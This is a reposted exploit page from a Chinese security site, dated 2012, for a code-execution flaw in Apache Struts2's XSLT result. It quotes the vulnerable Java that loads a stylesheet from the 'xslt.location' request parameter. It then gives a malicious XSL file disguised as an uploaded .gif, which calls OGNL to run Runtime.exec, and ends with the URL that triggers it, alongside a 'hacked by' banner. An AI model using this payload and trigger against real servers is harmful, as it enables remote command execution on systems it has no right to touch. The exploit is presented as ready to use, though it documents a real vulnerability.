Apache Struts2 Local Code Execution

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Apache Struts2 Local Code Execution

来源：www.inbreak.net 作者：kxlzx 发布时间：2012-03-26

the file:

http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java

String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
path = pathFromRequest;
URL resource = ServletActionContext.getServletContext().getResource(path);
templates = factory.newTemplates(new StreamSource(resource.openStream()));

A use of the action of xsltResult:
<action name="xslt" class="net.inbreak.xsltAction">
<result type="xslt"/>
</action>

An attacker can upload a file:

/upload/7758521.gif

<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0" xmlns:ognl="ognl.Ognl">
<xsl:template match="/">
<html> 
<body> 
<h2>hacked by kxlzx</h2> 
<h2>http://www.inbreak.net</h2> 
<exp>
<xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
</exp>
</body> 
</html> 
</xsl:template> 
</xsl:stylesheet>

open url

http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif

then struts2 will execute

ognl:getValue('@Runtime@getRuntime().exec("calc")', '')

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告